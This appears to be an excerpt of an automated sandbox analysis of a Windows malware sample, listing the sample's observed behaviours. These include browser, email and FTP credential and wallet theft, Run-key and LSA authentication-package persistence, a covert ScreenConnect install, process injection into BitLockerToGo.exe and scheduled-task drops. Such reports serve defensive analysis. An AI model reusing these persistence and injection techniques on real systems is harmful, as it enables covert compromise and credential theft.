N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\82ca9ecab5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038760101\\82ca9ecab5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038770121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c86579672.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038890101\\5c86579672.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fa494a26c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038900101\\fa494a26c4.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\mghrlwds.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\mghrlwds.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5044 set thread context of 6008 N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2140 set thread context of 5520 N/A C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 12576 set thread context of 12764 N/A N/A
PID 56880 set thread context of 57068 N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
File created C:\Windows\Installer\e595a99.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5B84.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5CDE.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5BB4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e595a99.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e595a9b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A N/A
N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000079521e240123cf490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000079521e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090079521e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d79521e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000079521e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133851041635327434" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
